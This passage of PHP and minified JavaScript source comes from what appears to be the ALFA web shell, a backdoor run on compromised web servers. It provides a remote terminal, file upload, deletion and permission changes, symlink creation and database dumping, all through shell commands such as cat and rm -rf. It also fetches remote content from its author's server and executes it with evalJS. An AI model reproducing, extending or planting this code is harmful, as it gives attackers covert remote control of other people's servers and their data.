class="dbh_'+o+'"><th>'+r+"</th><th>"+t[l].host+"</th><th>"+t[l].user+"</th><th>"+t[l].pass+"</th><th>"+t[l].db+'</th><th><button style="margin: unset;" class="connection-his-btn" onclick=\'alfaConnectToDb("'+o+'","'+a+'");\'>Connect</button></th><th style="text-align: center;"><button style="margin: unset;" class="connection-his-btn connection-delete" onclick=\'alfaDeleteConnectToDb("'+o+"\");'>X</button></th></tr>",r++}rows+="</table"}else e.setAttribute("mode","on"),rows="";d.querySelector("#"+a+" .connection_history_holder").innerHTML=rows}function alfaConnectionHistoryUpdate(e){var t,a={};try{a=JSON.parse(getCookie("alfa_connection_hist"))}catch(e){}for(t in mysql_cache)0!=mysql_cache[t].db.length&&(a[mysql_cache[t].user+"_"+mysql_cache[t].db]=mysql_cache[t]);void 0!==e&&delete a[e],setCookie("alfa_connection_hist",JSON.stringify(a),2012)}function alfaExecTerminal(e,t){var a="";if(0==(a=void 0!==t?"cd "+c_:e.c.value).length)return!1;"l"==a?a="ls -trh --color":"ll"==a&&(a="ls -ltrh --color");var i=e.getAttribute("term_id");alfaloader(i,"block"),closeHistoryCmd("free",e);var l="";"FORM"==e.tagName&&(l=e.querySelector(".php-terminal-current-dir").innerHTML),0==(l=l.trim()).length&&(l=c_);var r="a="+alfab64("terminalExec")+"&c="+alfab64(l)+"&alfa1="+alfab64(a)+"&ajax="+alfab64("true");if(_Ajax(d.URL,r,function(e,t){alfaloader(t,"none");try{var a=$("tab_"+i);null!=a&&((-1==a.classList.value.indexOf("active-terminal-tab")||cgi_is_minimized)&&(a.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",a.innerText)),cgi_is_minimized&&alfaUpdateOptionsBadge("cgiloader"))}catch(e){}e=JSON.parse(e),d.querySelector("#"+t+" .php-terminal-output > pre").innerHTML=e.output,0!=e.path.length&&(d.querySelector("#"+t+" .php-terminal-current-dir").innerHTML=e.path)},!1,i),void 0===t){d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+a+"</div>");var o=alfaGetTerminalHistory(),n=o.indexOf(a);-1!=n&&o.splice(n,1),o.push(a),setCookie("alfa-terminal-history",JSON.stringify(o),2012)}d.querySelector("#"+i+" input.php-terminal-input").focus()}function pageChangedFilesMan(e){var t="filesman_holder_"+alfa_current_fm_id,a=getCookie(t+"_page_number"),i=e.innerText;if("<<"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;if(!((a=parseInt(a))>1))return!1;i=a-1}if(">>"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;a=parseInt(a);var l=d.querySelector("#"+t+" .last-page-number").innerHTML;if(!(a+1<=(l=parseInt(l))))return!1;i=a+1}setCookie(t+"_page_number",i,2012),g("FilesMan",c_)}function alfaColDumperInit(){var e=d.querySelector(".tab_name.tab_is_active").getAttribute("opt_id"),t=d.querySelector("#"+e),a=t.getElementsByClassName("box");for(i=0;i<a.length;i++)a[i].addEventListener("click",function(){null!=this.parentElement.querySelector(".nested")&&(this.parentElement.querySelector(".nested").classList.toggle("active"),this.classList.toggle("check-box"))});var i;a=t.getElementsByClassName("sub-box");for(i=0;i<a.length;i++)a[i].setAttribute("opt_id",e),a[i].addEventListener("click",function(){this.classList.toggle("check-box");var e=this.getAttribute("tbl"),t=this.getAttribute("opt_id");t=t.replace("option_",""),col_dumper_selected_data.hasOwnProperty(t)||(col_dumper_selected_data[t]={}),void 0===col_dumper_selected_data[t][e]&&(col_dumper_selected_data[t][e]=[]);var a=this.innerHTML,i=col_dumper_selected_data[t][e].indexOf(a);-1==i?col_dumper_selected_data[t][e].push(a):col_dumper_selected_data[t][e].splice(i,1)})}function showSymlinkPath(e,t){t.stopPropagation();var a=e.getAttribute("row"),i=$("td_row_"+a),l=e.getAttribute("opt_title"),r=e.getAttribute("fname");if(l=decodeURIComponent(r)+" -> "+l,null!=i){i.insertAdjacentHTML("afterbegin",'<div class="symlink_path" id="link_id_'+a+'">'+l+"</div>");var o=t.clientX,n=t.clientY-30;$("link_id_"+a).style.left=o+"px",$("link_id_"+a).style.top=n+"px"}}function hideSymlinkPath(e,t){t.stopPropagation(),$("link_id_"+e.getAttribute("row")).remove()}function alfagetFlags(){data="a="+alfab64("get_flags")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,function(e){var t=JSON.parse(e);t.hasOwnProperty("server")&&(d.querySelectorAll(".flag-holder")[0].innerHTML='<img draggable="false" title="'+t.server.name+'" src="http://solevisible.com/images/flags/48/'+t.server.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[0].style.display="inline"),t.hasOwnProperty("client")&&(d.querySelectorAll(".flag-holder")[1].innerHTML='<img draggable="false" title="'+t.client.name+'" src="http://solevisible.com/images/flags/48/'+t.client.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[1].style.display="inline")})}function colDumplerSelectType(e){var t=e.options[e.selectedIndex].value;$("coldumper-delimiter-input").style.display="delimiter"==t?"inline-block":"none"}function alfaCheckUrlHash(){var e=window.location.hash.substr(1),t=e.split("&").reduce(function(e,t){var a=t.split("=");return e[a[0]]=a[1],e},{});if(""!=e)switch(t.action){case"fileman":case"options":t.path=decodeURIComponent(t.path),g("FilesMan",t.path,function(e){if(t.hasOwnProperty("file")){var a="auto";isArchive(t.file)&&(a="view"),editor(t.path+"/"+t.file,a,"","","","file")}}),"options"==t.action&&t.hasOwnProperty("opt")&&(alfa_can_add_opt=!0,g(t.opt,null,"","",""),d.querySelector(".opt-title").innerHTML=$("menu_opt_"+t.opt).innerHTML),t.hasOwnProperty("file")||editorClose("editor"),t.hasOwnProperty("opt")||editorClose("options_window"),editorClose("cgiloader");break;default:g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}else g("FilesMan","<?php echo $GLOBALS["cwd"]; ?>"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}function alfaFmngrContextRow(){d.querySelectorAll(".fmanager-row a.main_name").forEach(function(e){e.addEventListener("contextmenu",function(e){var t=e.target,a="";if(".."==(a="A"==e.target.parentElement.tagName?(t=e.target.parentElement).getAttribute("fname"):t.getAttribute("fname")))return!1;var i=t.getAttribute("id"),l=t.getAttribute("path"),r=t.getAttribute("ftype"),o=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete"];for(var n in"file"!=r||isArchive(a)?o[3]="view_archive":o.splice(11,1),"folder"==r&&(o=["newtab","link","move","copy","rename","modify","permission","compress","delete"]),alfaSortMenuItems(o),o){var s=d.querySelector("#rightclick_menu > a[name="+o[n]+"]");switch(s.setAttribute("fid",i),s.setAttribute("fname",decodeURIComponent(a)),s.setAttribute("path",l),s.setAttribute("ftype",r),o[n]){case"view":case"edit":var c="auto";"edit"==o[n]&&(c="edit"),s.setAttribute("href","#action=fileman&path="+c_+"/&file="+a),s.setAttribute("onclick","editor('"+a+"','"+c+"','','','','file')");break;case"newtab":var u=a;"file"==r?(u="&file="+a,s.setAttribute("href","#action=fileman&path="+c_+"/"+u),s.setAttribute("target","_blank"),s.onclick=function(){}):(s.setAttribute("href","javascript:void(0)"),s.removeAttribute("target"),s.onclick=function(){alfaFilesManNewTab(c_,u)});break;case"delete":s.setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';");break;case"download":s.setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')");break;case"permission":try{var p=d.querySelector("#id_chmode_"+i.replace("id_","")+" span").innerHTML;s.setAttribute("perm",p.trim())}catch(e){}break;case"link":s.style.display="block";var f="<?php echo $_SERVER["DOCUMENT_ROOT"]; ?>/",m=(c_+"/"+a).replace(/\/\//g,"/");if(-1!=m.indexOf(f)){f=m.replace(f,"");var b=location.origin+"/"+f;s.setAttribute("href",""+b)}else s.style.display="none"}}var y=e.clientX,_=e.clientY;alfaRightClickMenu(y,_),e.preventDefault()})})}function alfaFilesManNewTab(e,t,a){var i=t;void 0!==a&&(i=alfaGetLastFolderName(e));var l=decodeURIComponent(e+"/"+t);l=l.replace(/\/\//g,"/");var r=$("filesman_tab_1"),o=r.getAttribute("fm_counter");o=parseInt(o)+1,r.setAttribute("fm_counter",o),d.querySelector("#filesman_tabs_child").insertAdjacentHTML("beforeend",'<div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" path="'+l+'" id="filesman_tab_'+o+'" fm_id="'+o+'" onclick="filesmanTabController(this);" fname="'+t+'" class="filesman_tab"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span class="filesman-tab-folder-name">'+i+'</span> <img fm_id="'+o+'" onclick="closeFmTab(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector(".ajaxarea").insertAdjacentHTML("beforebegin",'<div style="position:relative;" fm_id="'+o+'" id="filesman_holder_'+o+'" class="ajaxarea"><div class="header"></div></div>'),alfa_fm_id=o,g("FilesMan",l),alfa_fm_id=0}function alfaFilesmanTabShowTitle(e,t){t.stopPropagation();var a=$("filesman-tab-full-path");a.style.display="block",a.style.top=e.offsetTop-37+"px",a.style.left=e.offsetLeft-$("filesman_tabs").scrollLeft+"px",a.innerHTML=e.getAttribute("path")}function alfaFilesmanTabHideTitle(e,t){$("filesman-tab-full-path").style.display="none"}function alfaPopupAction(e,t){var a="",i="";switch(t){case"rename":a="Old file name:",i="New file name:";break;case"copy":a="File path:",i="Enter the file path that you want to copy this file to:";break;case"move":a="Current Path:",i="Enter the file path that you want to move this file to:";break;case"extract":a="Files to extract:",i="Enter the path you wish to extract the files to and click Extract:"}var l=e.getAttribute("fname"),r=e.getAttribute("path"),o=t.charAt(0).toUpperCase()+t.slice(1);if("permission"==t){d.querySelector("#shortcutMenu-holder").style.height="222px",o="Change Permissions",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="block",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="none";var n=e.getAttribute("perm"),s=n.substr(1,1),c=n.substr(2,1),u=n.substr(3,1);d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s,d.querySelector("#shortcutMenu-holder > form input[name=g]").value=c,d.querySelector("#shortcutMenu-holder > form input[name=w]").value=u,autoCheckPerms(s,"u",["u","g","w"]),autoCheckPerms(c,"g"),autoCheckPerms(u,"w")}else d.querySelector("#shortcutMenu-holder").style.height="190px",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="block",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="none";var p="move"==t||"copy"==t?r+l:l;if("modify"==t){var f="tr_row_"+e.getAttribute("fid").replace("id_","");p=d.querySelector("#"+f+" .main_modify").innerText}d.querySelector(".cl-popup-fixed").style.display="block",d.querySelector("#shortcutMenu-holder .popup-head").innerHTML=o,d.querySelector("#shortcutMenu-holder .old-path-lbl").innerHTML=a,d.querySelector("#shortcutMenu-holder .new-filename-lbl").innerHTML=i,d.querySelector("#shortcutMenu-holder .popup-foot > button[name=accept]").innerHTML=o,d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=r+l,d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value=p,d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("fid",e.getAttribute("fid")),d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("action",t)}function calcperm(){var e=event.srcElement;autoCheckPerms(e.checked,e.name.substr(0,1))}function autoCheckPerms(e,t,a){if(void 0!==a)for(var i in a){var l=a[i];d.querySelector("#shortcutMenu-holder > form input[name="+l+"r]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"w]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"x]").checked=!1}var r=d.querySelector("#shortcutMenu-holder > form input[name="+t+"r]"),o=d.querySelector("#shortcutMenu-holder > form input[name="+t+"w]"),n=d.querySelector("#shortcutMenu-holder > form input[name="+t+"x]");if("boolean"!=typeof e)"7"==e?(r.checked=!0,o.checked=!0,n.checked=!0):"4"==e?r.checked=!0:"2"==e?o.checked=!0:"1"==e?n.checked=!0:"6"==e?(r.checked=!0,o.checked=!0):"3"==e?(o.checked=!0,n.checked=!0):"5"==e&&(r.checked=!0,n.checked=!0);else{var s=0;r.checked&&(s+=4),o.checked&&(s+=2),n.checked&&(s+=1),"u"==t?d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s:"g"==t?d.querySelector("#shortcutMenu-holder > form input[name=g]").value=s:"w"==t&&(d.querySelector("#shortcutMenu-holder > form input[name=w]").value=s)}}function gg(e,t,a,i,l,r){var o="filesman_holder_"+alfa_current_fm_id;alfaloader(o,"block"),data="a="+alfab64(e)+"&c="+alfab64(t)+"&alfa1="+alfab64(a)+"&alfa2="+alfab64(i)+"&alfa3="+alfab64(l)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,r,!1,o)}function alfaPopUpDoAction(e){var t=e.getAttribute("action");switch(t){case"rename":case"move":case"copy":var a=e.getAttribute("fid").replace("id_",""),i=$("id_"+a).getAttribute("fname"),l=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value;l=l.trim(),i=i.trim(),gg("doActions",c_,i,l,t,function(e,i){if("rename"==t)if("done"==e){var r=$("id_"+a);updateFileEditor(a,l);var o=r.getAttribute("path")+$("id_"+a).getAttribute("fname");d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o,r.addEventListener("animationend",function(){r.classList.remove("textEffect")}),r.classList.add("textEffect"),alfaShowNotification("Renamed...","Rename Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification("error...!","Rename Action","error");alfaloader(i,"none")});break;case"permission":var r=d.querySelector("#shortcutMenu-holder > form input[name=u]").value,o=d.querySelector("#shortcutMenu-holder > form input[name=g]").value,n=d.querySelector("#shortcutMenu-holder > form input[name=w]").value;i=(i=d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML).trim();var s=r.trim()+o.trim()+n.trim();gg("doActions",c_,i,s,t,function(e,t){alfaloader(t,"none"),alfaShowNotification(e,"Permission Action"),d.querySelector(".cl-popup-fixed").style.display="none"});break;case"modify":a=e.getAttribute("fid").replace("id_","");var c=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value,u=$("id_"+a).getAttribute("fname");gg("doActions",c_,c,u,t,function(t,a){if("ok"==t){var i="tr_row_"+e.getAttribute("fid").replace("id_","");d.querySelector("#"+i+" .main_modify").innerHTML=c,alfaShowNotification("success...","Modify Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification(t,"Modify Action","error");alfaloader(a,"none")})}}function alfaInitSoratableTab(e){Sortable.create(e,{direction:"horizontal",animation:300,ghostClass:"sortable-ghost",filter:".not-sortable"})}$("search-input").addEventListener("keydown",function(e){setTimeout(function(){var e=$("search-input").value;for(var t in d.getElementsByClassName("history-list")[0].innerHTML="",editor_files)if(-1!=editor_files[t].file.search(e)||""==e){var a=0;t==editor_current_file&&(a=" is_active"),insertToHistory(t,editor_files[t].file,a,editor_files[t].type)}},100)},!1),_Ajax(d.URL,"a="+alfab64("checkupdate"),function(e){if(0!=e.length&&"[]"!=e){var t=JSON.parse(e);if(t.hasOwnProperty("content")){d.body.insertAdjacentHTML("beforeend",t.content);try{evalJS(t.content)}catch(t){}}if(t.hasOwnProperty("copyright")&&($("alfa-copyright").innerHTML=t.copyright),t.hasOwnProperty("solevisible")&&($("alfa_solevisible").innerHTML=t.solevisible),t.hasOwnProperty("code_name")&&($("hidden_sh").innerHTML=t.code_name.replace(/\{version\}/g,t.version_number)),t.hasOwnProperty("market")){var a=d.querySelector("span.alfa_plus");if(t.market.hasOwnProperty("visible")&&"yes"==t.market.visible&&($("menu_opt_market").style.display="inline"),"open"!=t.market.status&&(a.style.color="#ffc107"),t.market.hasOwnProperty("content"))try{evalJS(t.market.content)}catch(t){}}}}),<?php echo $GLOBALS["need_to_update_header"]; ?>?_Ajax(d.URL,"a="+alfab64("updateheader"),function(e){try{var t=JSON.parse(e);for(var a in t){for(var i="",l=0;l<t[a].length;l++)i+="useful"==a||"downloader"==a?'<span class="header_values" style="margin-left: 4px;">'+t[a][l]+"</span>":t[a][l];var r=$("header_"+a);r&&(r.innerHTML=i)}$("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on")}catch(e){}}):islinux&&_Ajax(d.URL,"a="+alfab64("checkcgi"),function(e){"ok"==e&&($("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on"))}),function(){d.onclick=function(){can_hashchange_work=!1,setTimeout(function(){can_hashchange_work=!0},600)},window.onhashchange=function(e){can_hashchange_work&&alfaCheckUrlHash()},alfaCheckUrlHash(),alfagetFlags(),rightclick_menu_context=$("rightclick_menu").style,alfaInitCwdContext(),document.addEventListener("click",function(e){rightclick_menu_context.opacity="0",setTimeout(function(){rightclick_menu_context.visibility="hidden"},501)},!1);var e=document.createElement("script");e.src="https://cdnjs.cloudflare.com/ajax/libs/Sortable/1.10.2/Sortable.min.js",e.id="sortable-plugin",e.onload=function(){alfaInitSoratableTab($("filesman_tabs_child")),alfaInitSoratableTab(d.querySelector(".editor-tabs")),alfaInitSoratableTab(d.querySelector(".options_tab")),alfaInitSoratableTab(d.querySelector(".terminal-tabs")),alfaInitSoratableTab(d.querySelector(".sql-tabs"))},d.body.appendChild(e)}();
2402</script>
2403</body>
2404</html>
2405<?php
2406}}
2407if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
2408function posix_getpwuid($p) {return false;} }
2409if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
2410function posix_getgrgid($p) {return false;} }
2411function alfaWhich($p) {
2412$path = alfaEx('which ' . $p,false,false);
2413if(!empty($path))
2414return strlen($path);
2415return false;
2416}
2417function alfaSize($s) {
2418if($s >= 1073741824)
2419return sprintf('%1.2f', $s / 1073741824 ). ' GB';
2420elseif($s >= 1048576)
2421return sprintf('%1.2f', $s / 1048576 ) . ' MB';
2422elseif($s >= 1024)
2423return sprintf('%1.2f', $s / 1024 ) . ' KB';
2424else
2425return $s . ' B';
2426}
2427function alfaPerms($p) {
2428if (($p & 0xC000) == 0xC000)$i = 's';
2429elseif (($p & 0xA000) == 0xA000)$i = 'l';
2430elseif (($p & 0x8000) == 0x8000)$i = '-';
2431elseif (($p & 0x6000) == 0x6000)$i = 'b';
2432elseif (($p & 0x4000) == 0x4000)$i = 'd';
2433elseif (($p & 0x2000) == 0x2000)$i = 'c';
2434elseif (($p & 0x1000) == 0x1000)$i = 'p';
2435else $i = 'u';
2436$i .= (($p & 0x0100) ? 'r' : '-');
2437$i .= (($p & 0x0080) ? 'w' : '-');
2438$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
2439$i .= (($p & 0x0020) ? 'r' : '-');
2440$i .= (($p & 0x0010) ? 'w' : '-');
2441$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
2442$i .= (($p & 0x0004) ? 'r' : '-');
2443$i .= (($p & 0x0002) ? 'w' : '-');
2444$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
2445return $i;
2446}
2447function alfaPermsColor($f,$isbash=false){
2448$class = "";
2449$num = "";
2450$human = "";
2451if($isbash){
2452$class = $f["class"];
2453$num = $f["num"];
2454$human = $f["human"];
2455}else{
2456$num = substr(sprintf('%o', @fileperms($f)),-4);
2457$human = alfaPerms(@fileperms($f));
2458if(!@is_readable($f))
2459$class = "main_red_perm";
2460elseif (!@is_writable($f))
2461$class = "main_white_perm";
2462else
2463$class = "main_green_perm";
2464}
2465return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';
2466}
2467if(!function_exists("scandir")) {
2468function scandir($dir) {
2469$dh = opendir($dir);
2470while (false !== ($filename = readdir($dh)))
2471$files[] = $filename;
2472return $files;
2473}
2474}
2475function reArrayFiles($file_post){
2476$file_ary = array();
2477$file_count = count($file_post['name']);
2478$file_keys = array_keys($file_post);
2479for ($i=0; $i<$file_count; $i++) {
2480foreach ($file_keys as $key) {
2481$file_ary[$i][$key] = $file_post[$key][$i];
2482}
2483}
2484return $file_ary;
2485}
2486function _alfa_can_runCommand($cgi=true,$cache=true){
2487 if(isset($_COOKIE["alfa_canruncmd"])&&$cache){
2488 return true;
2489 }
2490 if(strlen(alfaEx("whoami",false,$cgi))>0){
2491 $_COOKIE["alfa_canruncmd"] = true;
2492 return true;
2493 }
2494 return false;
2495}
2496function _alfa_symlink($target, $link){
2497 $phpsym = function_exists("symlink");
2498 if($phpsym){
2499 @symlink($target, $link);
2500 }else{
2501 alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
2502 }
2503}
2504function _alfa_file_exists($file,$cgi=true){
2505 if(@file_exists($file)){
2506 return true;
2507 }else{
2508 if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
2509 return true;
2510 }
2511 }
2512 return false;
2513}
2514function _alfa_file($file,$cgi=true){
2515 $array = @file($file);
2516 if(!$array){
2517 if(strlen(alfaEx("id",false,$cgi))>0){
2518 $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
2519 if(strlen($data)>0){
2520 return explode("\n", $data);
2521 }else{
2522 return false;
2523 }
2524 }else{
2525 return false;
2526 }
2527 }else{
2528 return $array;
2529 }
2530}
2531function _alfa_is_writable($file){
2532 $check = false;
2533 $check = @is_writable($file);
2534 if(!$check){
2535 if(_alfa_can_runCommand()){
2536 $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
2537 if($check == "yes"){
2538 $check = true;
2539 }else{
2540 $check = false;
2541 }
2542 }
2543 }
2544 return $check;
2545}
2546function _alfa_is_dir($dir,$mode="-d"){
2547 $check = false;
2548 $check = @is_dir($dir);
2549 if($mode == "-e"){
2550 $check = @is_file($dir);
2551 }
2552 if(!$check){
2553 if(_alfa_can_runCommand()){
2554 $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
2555 if($check == "yes"){
2556 return true;
2557 }else{
2558 return false;
2559 }
2560 }
2561 }
2562 return $check;
2563}
2564function _alfa_load_ace_options($base){
2565 return '<span>Theme: </span><select class="ace-controler ace-theme-selector" base="'.$base.'" onChange="alfaAceChangeSetting(this,\'theme\');"><option value="terminal" selected>terminal</option><option value="ambiance">ambiance</option><option value="chaos">chaos</option><option value="chrome">chrome</option><option value="clouds">clouds</option><option value="clouds_midnight">clouds_midnight</option><option value="cobalt">cobalt</option><option value="crimson_editor">crimson_editor</option><option value="dawn">dawn</option><option value="dracula">dracula</option><option value="dreamweaver">dreamweaver</option><option value="eclipse">eclipse</option><option value="github">github</option><option value="gob">gob</option><option value="gruvbox">gruvbox</option><option value="idle_fingers">idle_fingers</option><option value="iplastic">iplastic</option><option value="katzenmilch">katzenmilch</option><option value="kr_theme">kr_theme</option><option value="kuroir">kuroir</option><option value="merbivore">merbivore</option><option value="merbivore_soft">merbivore_soft</option><option value="mono_industrial">mono_industrial</option><option value="monokai">monokai</option><option value="nord_dark">nord_dark</option><option value="pastel_on_dark">pastel_on_dark</option><option value="solarized_dark">solarized_dark</option><option value="solarized_light">solarized_light</option><option value="sqlserver">sqlserver</option><option value="textmate">textmate</option><option value="tomorrow">tomorrow</option><option value="tomorrow_night">tomorrow_night</option><option value="tomorrow_night_blue">tomorrow_night_blue</option><option value="tomorrow_night_bright">tomorrow_night_bright</option><option value="tomorrow_night_eighties">tomorrow_night_eighties</option><option value="twilight">twilight</option><option value="vibrant_ink">vibrant_ink</option><option value="xcode">xcode</option></select><span>Language: </span><select class="ace-controler" base="'.$base.'" onChange="alfaAceChangeSetting(this,\'lang\');"><option value="php">php</option><option value="python">python</option><option value="perl">perl</option><option value="c_cpp">c/c++</option><option value="csharp">c#</option><option value="ruby">ruby</option><option value="html">html</option><option value="javascript">javascript</option><option value="css">css</option><option value="xml">xml</option><option value="sql">sql</option><option value="swift">swift</option><option value="sh">bash</option><option value="lua">lua</option><option value="powershell">powershell</option><option value="jsp">jsp</option><option value="java">java</option><option value="json">json</option><option value="plain_text">plain_text</option></select><span>Soft Wrap: </span><input type="checkbox" name="wrapmode" class="ace-controler" onClick="alfaAceChangeWrapMode(this,\''.$base.'\');" checked> | <span>Font Size: </span><button class="ace-controler" style="cursor:pointer;" onclick="alfaAceChangeFontSize(\''.$base.'\',\'+\', this);return false;">+</button> | <button style="cursor:pointer;" class="ace-controler" onclick="alfaAceChangeFontSize(\''.$base.'\', \'-\', this);return false;">-</button> | ';
2566}
2567function alfaFilesMan2(){
2568 alfahead();
2569 AlfaNum(8,9,10,7,6,5,4);
2570 echo '<div style="position:relative;" fm_id="1" id="filesman_holder_1" class="ajaxarea filesman-active-content"><div class="header"></div></div>';
2571 alfaFooter();
2572}
2573function copy_paste($c,$s,$d){
2574if(@is_dir($c.$s)){
2575@mkdir($d.$s);
2576$h = @opendir($c.$s);
2577while (($f = @readdir($h)) !== false)
2578if (($f != ".") and ($f != ".."))
2579copy_paste($c.$s.'/',$f, $d.$s.'/');
2580} elseif(is_file($c.$s))
2581@copy($c.$s, $d.$s);
2582}
2583function alfaFilesMan(){
2584if(!empty ($_COOKIE['alfa_f']))
2585$_COOKIE['alfa_f'] = @unserialize($_COOKIE['alfa_f']);
2586if(!empty($_POST['alfa1'])){
2587switch($_POST['alfa1']){
2588case 'uploadFile':
2589$move_cmd_file = false;
2590$alfa_canruncmd = false;
2591if($GLOBALS['glob_chdir_false']){
2592 $alfa_canruncmd = _alfa_can_runCommand(true,true);
2593 $move_cmd_file = true;
2594}
2595if(_alfa_is_writable($GLOBALS['cwd'])){
2596$files = reArrayFiles($_FILES['f']);
2597$ret_files = array();
2598foreach($files as $file){
2599if($move_cmd_file&&$alfa_canruncmd){
2600 alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
2601}else{
2602 if(@move_uploaded_file($file['tmp_name'],$file['name'])){
2603 $ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($file['name'])):array("name" => "????");
2604 $gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($file['name'])):array("name" => "????");
2605 $file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($file['name']):"????");
2606 $file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($file['name']):"????");
2607 $file_modify = @date('Y-m-d H:i:s', @filemtime($file['name']));
2608 $file_perm = alfaPermsColor($file['name']);
2609 $file_size = @filesize($file['name']);
2610 $ret_files[] = array("name" => $file['name'], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner."/".$file_group);
2611 }
2612}
2613}
2614if(!$move_cmd_file){
2615 echo json_encode($ret_files);
2616}
2617}else{
2618 echo "noperm";
2619 return;
2620}
2621if(!$move_cmd_file){
2622return;
2623}
2624break;
2625case 'mkdir':
2626$new_dir_cmd = false;
2627if($GLOBALS['glob_chdir_false']){
2628 if(_alfa_can_runCommand(true,true)){
2629 if(_alfa_is_writable($GLOBALS['cwd'])){
2630 if(!_alfa_is_dir(trim($_POST['alfa2']))){
2631 alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
2632 echo "<script>alfaShowNotification('".addslashes($_POST['alfa2'])." created...', 'Files manager');</script>";
2633 }else{
2634 echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
2635 }
2636 }else{
2637 echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
2638 }
2639 }else{
2640 echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>";
2641 }
2642}else{
2643 if(_alfa_is_writable($GLOBALS['cwd'])){
2644 if(!_alfa_is_dir(trim($_POST['alfa2']))){
2645 if(!@mkdir(trim($_POST['alfa2']))){
2646 echo "<script>alfaShowNotification('Can\'t create new dir !', 'Files manager', 'error');</script>";
2647 }else{
2648 echo "<script>alfaShowNotification('".addslashes($_POST['alfa2'])." created...', 'Files manager');</script>";
2649 }
2650 }else{
2651 echo "<script>alfaShowNotification('folder already existed', 'Files manager', 'error');</script>";
2652 }
2653 }else{
2654 echo "<script>alfaShowNotification('folder isnt writable !', 'Files manager', 'error');</script>";
2655 }
2656}
2657break;
2658case 'delete':
2659function deleteDir($path){
2660$path = (substr($path,-1)=='/') ? $path:$path.'/';
2661$dh = @opendir($path);
2662while(($item = @readdir($dh)) !== false){
2663$item = $path.$item;
2664if((basename($item) == "..") || (basename($item) == "."))
2665continue;
2666$type = @filetype($item);
2667if ($type == "dir")
2668deleteDir($item);
2669else
2670@unlink($item);
2671}
2672@closedir($dh);
2673@rmdir($path);
2674}
2675if(is_array(@$_POST['f']))
2676foreach($_POST['f'] as $f){
2677if($f == '..')
2678continue;
2679$f = rawurldecode($f);
2680if($GLOBALS["glob_chdir_false"]){
2681 if(_alfa_can_runCommand(true,true)){
2682 alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
2683 }
2684}else{
2685alfaEx("rm -rf '".addslashes($f)."'",false,false);
2686if(@is_dir($f))
2687deleteDir($f);
2688else
